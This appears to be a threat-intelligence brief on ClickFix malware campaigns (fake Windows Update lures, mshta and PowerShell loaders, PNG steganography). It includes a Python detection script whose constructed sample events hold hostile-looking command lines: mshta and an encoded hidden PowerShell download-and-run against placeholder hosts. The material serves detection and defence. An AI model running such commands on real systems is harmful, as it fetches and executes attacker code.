Summary: New ClickFix variants use full-screen fake Windows Update pages to trick users into executing attacker-controlled CMD commands. Payloads (LummaC2, Rhadamanthys) are hidden inside PNG pixel data via steganography and reconstructed in memory using PowerShell + a .NET Stego Loader.
🔗 Additional Research (Huntress): https://www.huntress.com/blog/clickfix-malware-buried-in-images
🧩 Classification
Category: Malware / Social Engineering / Steganography / Infostealers
Verticals Impacted: Global
Type of Intel: 🛡️ Tactical | ⚡ Operational
Noted TTPs:
Fake Windows Update / human-verification pages
Clipboard-based execution
mshta.exe → malicious JavaScript
Multi-stage PowerShell loaders
.NET Stego Loader (PNG pixel-data steganography, AES encrypted)
Donut-packed shellcode
LummaC2 & Rhadamanthys delivery
Heavy function trampoline evasion (10k empty calls)
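Added example, not from the IndigoINT report or the Huntress research: a small triage routine for the execution chain these TTPs describe (explorer.exe → pasted command → mshta.exe → PowerShell loader), run over constructed Sysmon Event ID 1-style process-creation records. Hostnames use the reserved .invalid TLD, the regexes are our own heuristics rather than any vendor's rules, and the "PowerShell fetches an image URL" check is an assumption (the report says the payload was carried in PNG pixel data, not how the PNG reached the host).

```python
"""ClickFix chain triage over process-creation telemetry.

Added example, not from the IndigoINT report or Huntress research. Events
below are constructed, Sysmon Event ID 1-style records with placeholder
hosts (.invalid TLD); the regexes are heuristics, not the vendors' rules.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the parent
    command_line: str


SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
LOLBINS = SCRIPT_HOSTS | {"cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# Any prefix of -EncodedCommand (-e, -ec, -enc, ...) followed by a base64 blob.
ENC_RE = re.compile(r"(?:^|\s)-e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.I)
HIDDEN_RE = re.compile(r"(?:^|\s)-w[a-z]*\s+h(?:idden)?\b", re.I)
# Assumption: the stego carrier was pulled over HTTP by the loader; the report
# does not state how the PNG reached the host.
IMAGE_URL_RE = re.compile(r"https?://\S+\.(?:png|jpe?g|gif|bmp)\b", re.I)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage(events):
    """Return (rule, pid) findings for single-event indicators."""
    findings = []
    for e in events:
        img, parent, cmd = basename(e.image), basename(e.parent_image), e.command_line
        # Win+R paste: explorer.exe is the parent of whatever the victim ran.
        if parent == "explorer.exe" and img in LOLBINS and URL_RE.search(cmd):
            findings.append(("clickfix_run_dialog_lolbin_url", e.pid))
        if img == "mshta.exe" and URL_RE.search(cmd):
            findings.append(("mshta_remote_script", e.pid))
        if img in SCRIPT_HOSTS and parent == "mshta.exe":
            findings.append(("mshta_spawns_powershell", e.pid))
        if img in SCRIPT_HOSTS and (ENC_RE.search(cmd) or HIDDEN_RE.search(cmd)):
            findings.append(("powershell_encoded_or_hidden", e.pid))
        if img in SCRIPT_HOSTS and IMAGE_URL_RE.search(cmd):
            findings.append(("powershell_fetches_image", e.pid))
    return findings


def ancestry(events, pid):
    """Image basenames from the oldest known ancestor down to pid."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def clickfix_chains(events):
    """PIDs of PowerShell processes descended from explorer.exe via mshta.exe."""
    hits = []
    for e in events:
        chain = ancestry(events, e.pid)
        if (chain[-1] in SCRIPT_HOSTS and "explorer.exe" in chain and "mshta.exe" in chain
                and chain.index("explorer.exe") < chain.index("mshta.exe")):
            hits.append(e.pid)
    return hits


# Constructed sample: one ClickFix chain plus two benign processes.
SAMPLE_EVENTS = [
    ProcEvent(1000, 800, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              "cmd.exe /c mshta https://update-check.invalid/verify.hta"),
    ProcEvent(3000, 2000, r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\cmd.exe",
              "mshta https://update-check.invalid/verify.hta"),
    ProcEvent(4000, 3000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe",
              "powershell.exe -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"),
    ProcEvent(5000, 4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -c \"$b=(New-Object Net.WebClient).DownloadData('https://update-check.invalid/assets/banner.png')\""),
    ProcEvent(6000, 1000, r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Windows\explorer.exe",
              '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" https://www.example.com/'),
    ProcEvent(7000, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\svchost.exe",
              "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for rule, pid in triage(SAMPLE_EVENTS):
        print(f"{rule:34} pid={pid} chain={' > '.join(ancestry(SAMPLE_EVENTS, pid))}")
    print("full chains:", clickfix_chains(SAMPLE_EVENTS))
```

The single-event rules are what you would paste into a SIEM search first; `clickfix_chains` is the pivot that separates a genuine ClickFix victim from an admin who legitimately runs encoded PowerShell, because the explorer.exe → mshta.exe → powershell.exe lineage is what the pasted command produces and what scheduled tasks and service-launched scripts do not. Swap the constructed `SAMPLE_EVENTS` for your own EDR or Sysmon export (pid, ppid, image, parent image, command line) and the same functions apply.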
🛠 Final Notes
We write these for the analyst trying to triage 20 open tabs, the blue-teamer who needs to pivot fast, and the CISO who wants to understand why this matters without reading 3 emails or articles. If you’re one of them, you’re why we’re here.
We’ll be publishing deep-dive reports, enriched IOCs and more for paid members. Need a complete system to track threats and streamline your intelligence workflow? 👉 Check out the IndigoINT Threat Intelligence Marketplace
❤️🔥 Remember, in the dark we are all the same. ❤️🔥
— Yasmine | IndigoINT
Appendix
n/a
📝 Disclaimer
IndigoINT may use AI tools to assist with formatting, grammar, and low-level analysis support. All content is reviewed by a human analyst and undergoes internal peer review to ensure accuracy and integrity.
You may see slight formatting and content changes in the first few months; please be patient with us as we find just the right fit!